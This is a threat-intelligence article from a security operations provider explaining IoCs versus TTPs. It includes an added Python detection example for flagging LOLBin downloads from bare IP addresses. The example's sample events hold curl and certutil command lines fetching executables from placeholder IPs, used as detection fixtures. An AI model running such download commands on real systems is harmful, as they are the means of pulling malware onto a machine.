When cybercriminals strike, they leave behind digital fingerprints. These traces, known as IoCs, can help you detect recurring threats, but not all clues hold up equally well in different situations.
Each cyberattack leaves behind evidence indicating that an attack has occurred. For a server breach, this might include the IP address from which the attack originated. For a phishing email, it could be the email address and domain of the phishing site. For malware files, this may involve their hash value. These are Indicators of Compromise (IoCs) that can be documented and used to detect the same type of attack in the future.
IoCs are particularly effective for detecting phishing. This is because phishing emails referring to the same domain of the phishing site are sent to numerous email addresses. As soon as we know that this domain hosts a phishing site, we can detect it for future recipients. However, for advanced attacks, IoCs are not as beneficial. If cybercriminals attack a server of organization X from a particular virtual machine in the cloud, they’ll likely carry out the same attack on organization Y from a different virtual machine with another IP address. This makes the IP address from which the attack originated a less reliable IoC, as it doesn’t generalize well to other cases. While it can help detect attacks from the same IP address instantly, this indicator is generally more volatile and not valid for long.
Instead of focusing on one-off clues, TTPs reveal the “how” behind an attack. By studying adversary behaviors, you can spot patterns that remain relevant long after an IP address or domain changes.
Another approach is to examine the behavior, actions, or processes used by threat actors. So, if a server is compromised, instead of focusing on the IP address of the origin, you would assess the mechanism used to deliver the malware. For example, malware can be downloaded and installed on a workstation using a legitimate tool that is already present on it (a LOLBin, or Living Off The Land Binary), such as Curl or Certutil, to connect to an IP address hosting the malware. The attackers might change the IP address, but using Curl to download a file from a bare IP address instead of a fully qualified domain name could indicate attacker tools are being pulled onto the system.
These Tactics, Techniques, and Procedures (TTPs) are a more reliable way to detect attacks because they generalize well. Of course, some will only be relevant for a limited time. For instance, a year ago, cyberattackers concealed malware in OneNote documents emailed to their victims. When this method gained popularity, Microsoft updated OneNote to prevent it from starting other processes. This TTP then became irrelevant. However, downloading malware with LOLBins will always remain a relevant TTP: programs with built-in download mechanisms will always exist, as a lot of legitimate functionality, such as update mechanisms, relies on this capability. TTPs are generally less volatile than IoCs.
Threat intelligence is only useful if it’s applied effectively. At Cegeka’s Modern SOC, we translate IoCs and TTPs into operational, tactical, and strategic insights to help our clients stay resilient.
For threat intelligence, Cegeka’s Modern SOC operates on three levels: operational, tactical, and strategic.
On the operational level, we promptly detect threats by correlating known IoCs with data from our SIEM (Security Information and Event Management) platforms. We identify IP addresses, URLs, domains, and file hashes previously observed in attacks. We also use these IoCs to enrich security incident data. We rely on a curated threat intelligence source from an industry-leading partner that assigns a risk score to each IoC, which gives us a good balance between detection rate and false positives.
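The two detection approaches described above, as an added example that is not Cegeka's code: a risk-scored IoC lookup (the operational level) and the LOLBin-downloads-from-a-bare-IP rule from the TTP section, both run over constructed process-creation events. The event fields, the IoC feed, its scores and the threshold are assumptions for illustration.

```python
"""Added example: IoC correlation with a risk-score threshold, plus a
LOLBin TTP rule, over constructed SIEM-style process events.
Feed contents, scores and event fields are illustrative assumptions."""
import re
from urllib.parse import urlparse

# Constructed IoC feed: indicator -> risk score (0-100), as a curated source might supply.
IOC_FEED = {"203.0.113.10": 85, "evil-login.example": 95, "198.51.100.7": 30}
RISK_THRESHOLD = 70  # assumed cut-off: only high-confidence IoCs raise alerts

LOLBINS = {"curl", "curl.exe", "certutil", "certutil.exe"}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
URL_RE = re.compile(r"https?://\S+")

# Constructed process-creation events; documentation ranges are used for the IPs.
EVENTS = [
    {"host": "ws01", "image": "curl.exe", "cmdline": "curl.exe -o C:\\Users\\Public\\a.exe http://203.0.113.10/a.exe"},
    {"host": "ws02", "image": "certutil.exe", "cmdline": "certutil.exe -urlcache -f http://192.0.2.55/x.dat x.dat"},
    {"host": "ws03", "image": "curl.exe", "cmdline": "curl.exe https://updates.example.com/manifest.json"},
    {"host": "ws04", "image": "chrome.exe", "cmdline": "chrome.exe https://evil-login.example/"},
    {"host": "ws05", "image": "chrome.exe", "cmdline": "chrome.exe http://198.51.100.7/"},
]

def extract_hosts(cmdline):
    """Return the host part of every URL found on the command line."""
    hosts = [urlparse(u).hostname for u in URL_RE.findall(cmdline)]
    return [h for h in hosts if h]

def ioc_match(event):
    """Operational level: IoCs on the command line whose score meets the threshold."""
    return [h for h in extract_hosts(event["cmdline"]) if IOC_FEED.get(h, 0) >= RISK_THRESHOLD]

def lolbin_ip_download(event):
    """Tactical level: a LOLBin fetching from a bare IP literal instead of an FQDN."""
    if event["image"].lower() not in LOLBINS:
        return False
    return any(IPV4.match(h) for h in extract_hosts(event["cmdline"]))

def triage(events):
    """Return (host, reason) tuples for every event that hits either rule."""
    findings = []
    for e in events:
        for ioc in ioc_match(e):
            findings.append((e["host"], f"ioc:{ioc}"))
        if lolbin_ip_download(e):
            findings.append((e["host"], "ttp:lolbin-ip-download"))
    return findings
```

Note that ws02 is caught only by the TTP rule, since its IP appears in no feed, while ws05 is suppressed because its indicator scores below the threshold.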
On the tactical level, we perform threat hunting based on relevant TTPs extracted from our threat intelligence sources. Our senior CSIRT analysts regularly review our security logs, manually examining all occurrences of a specific TTP. They filter out any instance that seems legitimate, until they identify something that deviates from the normal behavior, potentially leading to the detection of an attack. Our threat intelligence sources also support detection engineering: determining exactly what we should detect (and prevent) to maximize threat coverage efficiently.
On the strategic level, we write threat intelligence reports with a comprehensive analysis of incidents, attacks, and emerging trends or techniques. We do this at the request of the client or on our own initiative. The purpose of these reports is to monitor trends in the global threat landscape to inform our strategic decisions, investments, and engineering efforts. This is how we noticed attackers increasingly bypassing EDR (Endpoint Detection & Response) tools a few years ago. After analyzing this trend, we opted to invest in complementary NDR (Network Detection & Response) tools, while still realizing the importance of EDR. We also use threat intelligence for threat modeling: analyzing our client’s risk profile, identifying the relevant threat actors for the client, evaluating gaps in their defenses, and then providing quantitative advice on effectively addressing these gaps. Therefore, on a strategic level, threat intelligence enables us to make informed decisions and offer sound advice to our clients.
When you understand both the clues attackers leave behind and the methods they rely on, you can strengthen your defenses more effectively. That’s the true value of threat intelligence: turning data into clear, actionable security decisions.
Threat intelligence is vital for gaining insights into your attackers. Understanding what your attackers use (IoCs) and how they implement it (TTPs) allows you to respond quickly and protect your systems from those attacks that have previously succeeded with others.